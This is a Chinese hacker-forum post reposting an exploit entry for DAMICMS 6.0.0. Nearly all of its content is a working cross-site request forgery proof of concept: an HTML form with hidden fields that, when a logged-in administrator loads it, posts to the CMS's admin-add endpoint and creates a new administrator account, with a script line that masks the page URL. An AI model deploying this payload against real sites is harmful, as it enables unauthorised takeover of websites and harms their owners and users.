跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)

精选回复

发布于
<!--
# Exploit Title: DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)
# Date: 2018-06-30
# Exploit Author: bay0net
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9248562.html
# Software Link: https://www.damicms.com/Down#
# Version:  DAMICMS_V6.0.0
# CVE : N/A

# DamiCMS v6.0.0 allows CSRF via admin.php?s=/Admin/doadd to add an administrator account.
# The payload for attack is as follows.
-->

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://Target/dami/admin.php?s=/Admin/doadd" method="POST">
      <input type="hidden" name="username" value="test22" />
      <input type="hidden" name="password" value="test22" />
      <input type="hidden" name="role_id" value="1" />
      <input type="hidden" name="Submit" value="添加" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
            

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。